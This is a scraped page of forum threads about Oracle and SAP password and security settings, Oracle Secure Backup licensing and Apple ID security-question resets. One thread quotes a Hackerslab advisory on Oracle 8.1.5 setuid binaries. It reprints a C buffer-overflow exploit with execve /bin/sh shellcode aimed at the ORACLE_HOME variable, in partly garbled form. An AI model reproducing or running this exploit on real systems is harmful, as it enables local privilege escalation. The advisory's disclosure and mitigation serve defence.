Security Methodology and Oracle Solution

Similar Messages

• Error when changing password of NW J2ee's secure store and Oracle sqlplus

  Hi all,
  I am wondering on the following:
  Current setting:
  I have "old_password" for J2ee configtool's secure store.
  I have "old_password" for Oracle's sapsr2 user inside Sqlplus.
  When I change the password for all 3 place from "old_password" to "new_password", I am not able to connect to configtool. I am also not able to start the Portal service; with logfile error "invalid user/password"
  If I change the password back to "old_password", I can connect to configtool as well as start the service.
  Snote and forumers (google) mention that update configtool's secure store and "alter user sapsr3" for Oracle database is all I need to change password.
  Have I miss out some step in order to change the password for my Enterprise Portal?
  Thank you.
  Regards

  edit: never mind, found the meaning of SDM.
  but the command below, is it usable?
  For Windows OS:
  Open a command prompt and navigate to the folder <Drive>:\usr\sap\DP1\JC21\SDM\program
  Execute the below commands:
  sdm jstartup "mode=standalone"
  sdm changepassword "newpassword=<Enterthenewpassword>"
  sdm jstartup "mode=integrated"
  StartServer.bat
  Edited by: Sek Yao Ooi on Dec 7, 2009 9:21 AM

• Enterpise User Security, OID and Oracle Advanced Security

  Do we also need Oracle Advanced Security when using the OID
  solution (Oracle Application Server)? I just seem to remember
  coming across something where some portion of the LDAP directory
  needed to communicate over SSL, and I wasn't sure if this
  implied that Oracle Advanced Security was needed.
  Thanks.

  Hi!
  As long as you use the LDAP via SSL purely in the Application Server then there is no need for Advanced Security.
  As you mentioned Enterprise Users - which is a database user authenticated by the OID, you will need the Advanced Security option.
  cu
  Andreas

• Oracle RAC and Oracle Secure Backup Express

  I am building a new RAC environment - 7-Nodes on Linux.
  We are very interested in reviewing Oracle Secure Backup, possible Oracle Secure Backup Express.
  My understanding about Oracle Secur eBackup Express is it is licensed "free" as long as you are working with a single tape drive.
  Does anyone know - does this apply to RAC as well?
  Thanks

  Please refer to the OSB licensing document for
  specific differences between OSB-XE and OSB:
  http://download-west.oracle.com/docs/cd/B32520_01/doc/
  license.101/b25528/toc.htm
  In general, we recommend you backup each RAC node to
  insure all local files are protected which would mean
  the OSB-XE edition would not be recommended since
  OSB-XE is backup of one server.Thank you - I will review this.
  .. and your White Papers regarding performance were just what I was looking for.

• Advance Replication and Oracle Label Security

  Has anyone been able to configure both Advance Replication and Oracle Label Security to work together?

  This is currently not supported in Streams. I have an enhancement request in with Oracle for this functionality. This won't be seen in 11g R2 either.
  Has anyone done Label Security with Advance Replication?

• I am trying to change my password, but not remember the security questions and not access recovery email. Please give me a solution.Ana Maria Cappatto Simoes/ F. 11.50414433

  I am trying to change my password, but not remember the security questions and not access recovery email. Please give me a solution.Ana Maria Cappatto Simoes/ F. 11.50414433

  Welcome to the Apple Community.
      1.    Start here (change country if necessary) and navigate to 'Password and Security', reset your security questions using the link provided, you will receive an email to your rescue address, use the link in the email and reset your security questions.
      2.    If that doesn't help, you don't receive a reset email or you don't have a rescue address, you should contact AppleCare who will initially try to assist you with a reset email or if unsuccessful will pass you to the security team to reset your security questions for you.
      3.    If you are in a region that doesn't have international telephone support try contacting Apple through iTunes Store Support.

• Forgotten my security questions and cannot purcahse any apps etc. solutions on internet with rescue e-mail don't work . Have been trying to resolve this issue for 3 days now

  Forgotten my security questions and cannot purcahse any apps etc. solutions on internet with rescue e-mail don't work . Have been trying to resolve this issue for 3 days now

  If you don't have a rescue email address (or you do but aren't the receiving the email to it) then you will need to contact iTunes Support / Apple to get the questions reset.
  Contacting Apple about account security : http://support.apple.com/kb/HT5699
  When they've been reset (and if you don't already have a rescue email address) you can then use the steps half-way down this page to add a rescue email address for potential future use : http://support.apple.com/kb/HT5312

• I forgot my security answers and i have provided rescue email same as apple id its been 6 monts and still no solution found i have credits in my account please help

  i forgot my security answers and i have provided rescue email same as apple id its been 6 monts and still no solution found i have credits in my account please help

  Well, of course a rescue address which is the same as the main address (which doesn't work) isn't a lot of use.
  Please see Kappy's comprehensive User Tip:
  https://discussions.apple.com/docs/DOC-4551

• I do not know the security questions and when do I apply for the questions do not come to on Emile rescue!! What is the solution..?

  I do not know the security questions and when do I apply for the questions do not come to on Emile rescue!! What is the solution..?

  If the email hasn't arrived after a few hours and isn't in a spam filter, click here, phone Apple, and ask for the Account Security team.
  (87129)

• Specific courses on OLAP and oracle security

  sir
  can anyone specify on specific courses and book(s) on OLAP and oracle db security?
  thanx in advance

  OLAP: Depends entirely on what you want to accomplish - basics, tools, migrating data to, etc.
  I teach and recommend "Oracle Database 10g: Using OLAP (Data Warehousing and Oracle BI)" as a starter. Other stuff, go to http://education.oracle.com , enter 'OLAP' into the Search box and hit 'Go' button.
  Database Security: Depends entirely on what you want to accomplish, but I find Oracle University course offerings lacking in this area. (I really wish May Ann Davidson would do something about that, and I'd love to help.)
  The OCP Admin I and Admin II course each have a chapter discussing Security. I think these are rather simplistic for the commercial world, but most OCP candidates I see get stymied by even that level.
  The "Oracle Database 10g: Security Release 2" course is a reasonably good starting point, but few offer it. (And yes, I teach that as well)

• I forgot my security answers and I have no rescue email, What is the solution?

  I forgot my security answers and I have no rescue email, I am trying to purchase as usuall but this time seems different, app store is asking me to answer the questions and I have no idea about the answers. WHAT TO DO? as I mentioned I have no rescue mail.

  Contact applecare support at 800-275-2273, ask for someone in account security - to reset security questions.  After the advisor verifies your identity, they can reset your security questions.
  Have a great day.

• I have forgot the apple id security questions and i dont have rescue e mail id also pls tell me the solution

  I have forgot the apple id security questions and i dont have rescue e mail id also pls tell me the solution

  Read here:
  http://support.apple.com/kb/ht5312
  If nothing works, either:
  Go here, ask for assistance:
  https://getsupport.apple.com/GetproductgroupList.action
  Or, call AppleCare & ask for "Account Security".

• Solution to reseting your security questions and answers

  I had trouble reseting it 'cause apple wouldnt let me do it so I decided to call them! And they fixed it for me!
  Call at 1-800-263-3394 and they're open from 8 am till 8 pm Central. I hope this helps you out!!

  The Best Alternatives for Security Questions and Rescue Mail
       1.  Send Apple an email request at: Apple - Support - iTunes Store - Contact Us.
       2.  Call Apple Support in your country: Customer Service: Contact Apple support.
       3.  Rescue email address and how to reset Apple ID security questions.
  An alternative to using the security questions is to use 2-step verification:
  Two-step verification FAQ Get answers to frequently asked questions about two-step verification for Apple ID.

• Security vulnerability in Oracle 8.1.5

  The following email was forwarded to me about possible security vulnerabilities.
  I am looking for verification from both Oracle and the user comunity.
  ================================================================================
  [ Hackerslab bug_paper ] Linux ORACLE 8.1.5 vulnerability
  ================================================================================
  File : Oracle 8.1.5
  SYSTEM : LINUX
  Tested by RedHat Linux 6.2
  INFO :
  There are two security vulnerability in Oracle.
  1. buffer overflow
  It is possible to create a buffer overflow vulnerability using "ORACLE_HOME",
  one of the environmental value of Oracle.
  Oracle applications that are vulnerable to buffer overflow are as follow :
  - names
  - namesctl
  - onrsd
  - osslogin
  - tnslsnr
  - tnsping
  - trcasst
  - trcroute
  Thease applications allow an attacker to excute a buffer overflow exploit.
  2. Log-files created
  When a user excutes one of Oracle applications such as names, oracle or tnslsnr,
  following log files are created.
  names
  ======
  -rw-rw-r-- 1 oracle dba 0 Oct 20 01:45 ckpcch.ora
  -rw-rw-r-- 1 oracle dba 428 Oct 20 01:45 ckpreg.ora
  -rw-rw-r-- 1 oracle dba 950 Oct 20 01:45 names.log
  oracle
  ======
  -rw-rw---- 1 oracle dba 616 Oct 20 05:14 ora_[running pid].trc
  tnslsnr
  =======
  -rw-rw-r-- 1 oracle dba 2182176 Oct 20 2000 listener.log
  SOLUTION
  Contact your vendor for a patch or close setuid permission.
  # su - oracle
  $ cd /oracle_8.1.5_install_directory/bin
  $ chmod a-s names namesctl onrsd osslogin tnslsnr tnsping trcasst trcroute
  ==-------------------------------------------------------------------------------==
  * ** ** * [email protected] [yong-jun, kim]
  * ** ** * [ [URL=http://www.hackerslab.org]http://www.hackerslab.org ]
  ******** HACKERSLAB (C) since 1999
  ==-------------------------------------------------------------------------------==
  Oracle 8.1.5 exploit
  -by loveyou
  offset value : -500 ~ +500
  #include <stdio.h>
  #include <stdlib.h>
  #define BUFFER 800
  #define NOP 0x90
  #define PATH "/hackerslab/loveyou/oracle/8.1.5/bin/names"
  char shellcode[] =
  /* - K2 - */
  /* main: */
  "\xeb\x1d" /* jmp callz */
  /* start: */
  "\x5e" /* popl %esi */
  "\x29\xc0" /* subl %eax, %eax */
  "\x88\x46\x07" /* movb %al, 0x07(%esi) */
  "\x89\x46\x0c" /* movl %eax, 0x0c(%esi) */
  "\x89\x76\x08" /* movl %esi, 0x08(%esi) */
  "\xb0\x0b" /* movb $0x0b, %al */
  "\x87\xf3" /* xchgl %esi, %ebx */
  "\x8d\x4b\x08" /* leal 0x08(%ebx), %ecx */
  "\x8d\x53\x0c" /* leal 0x0c(%ebx), %edx */
  "\xcd\x80" /* int $0x80 */
  "\x29\xc0" /* subl %eax, %eax */
  "\x40" /* incl %eax */
  "\xcd\x80" /* int $0x80 */
  /* callz: */
  "\xe8\xde\xff\xff\xff" /* call start */
  "/bin/sh";
  unsigned long getesp(void)
  __asm__("movl %esp,%eax");
  int main(int argc, char *argv[])
  char buff, ptr,binary[120];
  long *addr_ptr, addr;
  int bsize=BUFFER;
  int i,offset;
  offset = 0 ;
  if ( argc > 1 ) offset = atoi(argv[1]);
  buff = malloc(bsize);
  addr = getesp() - 5933 - offset;
  ptr = buff;
  addr_ptr = (long *) ptr;
  for (i = 0; i < bsize; i+=4)
  *(addr_ptr++) = addr;
  memset(buff,bsize/2,NOP);
  ptr = buff + ((bsize/2) - (strlen(shellcode)/2));
  for (i = 0; i < strlen(shellcode); i++)
  *(ptr++) = shellcode;
  buff[bsize - 1] = '\0';
  setenv("ORACLE_HOME",buff,1);
  printf("[ offset:%d buffer=%d ret:0x%x ]\n",
  offset,strlen(buff),addr);
  system(PATH);
  null

  Hi Peter,
  I was told that Oracle8 and Oracle8i Parallel Server on IBM
  RS/6000 AIX comes with its own Lock Manager and this LM does not
  rely on the Cluster Lock Manager (cllockd) of HACMP for AIX, as
  Oracle7 Parallel Server on normal (non-SP) RS/6000 does.
  (Oracle7 Parallel Server on RS/6000 SP didn't use the cllockd of
  HACMP but came with a special LM.)
  Cluster-wide Filesystems are not used for OPS on Unix, as far as
  I know Unix (AIX, Solaris). All Data-, Log- and Control-Files
  must reside on concurrently (!) accessible Raw-Devices (e.g. Raw
  Logical Volumes on AIX).
  So I guess it should be possible for Oracle to port OPS to Linux.
  No special Cluster-Services would be needed for OPS on Linux,
  just a shared SCSI-bus (e.g.) and a fast interconnect (e.g.
  100BaseT).
  Peter Sechser (guest) wrote:
  : Dave,
  : Parallel Server needs some cluster services in order to
  : communicate between several nodes. So, the operating system has
  : to offer things like inter-node communication services,
  : cluster-wide lock communication services and a clusterwide
  : filesystem. I'm not quite sure, to what degree Linux
  offers/will
  : offer these services.
  : Peter
  null

• Security when using oracle text

  Hello,
  We would like to use Oracle text functionality on Oracle 10 but the System Admin told us that Oracle is accessing the filesystem with the user account who launched the oracle instance.
  He told us that this is a security problem : giving oracle password gives access to the file system.
  Is that true and is there a solution to make oracle connect to the filesystem with another linux user account ?
  Thanks a lot !

  raford wrote:
  This only applies when you use the FILE_DATASTORE to index documents on disk, rather than in the file system.
  You can restrict access to this feature by only allowing users having a specific role to use it - see
  http://download.oracle.com/docs/cd/B28359_01/text.111/b28304/cdatadic.htm#BHCBIFEA
  (NB. this is in the 11g documentation - I can't find it in the 10g manual but the functionality is the same).
  It's the database process itself which accesses the files, so it will always access them as the owner of the database process, there's no way to change that.What do you mean when you said " FILE_DATASTORE to index documents on disk, rather than in the file system" ?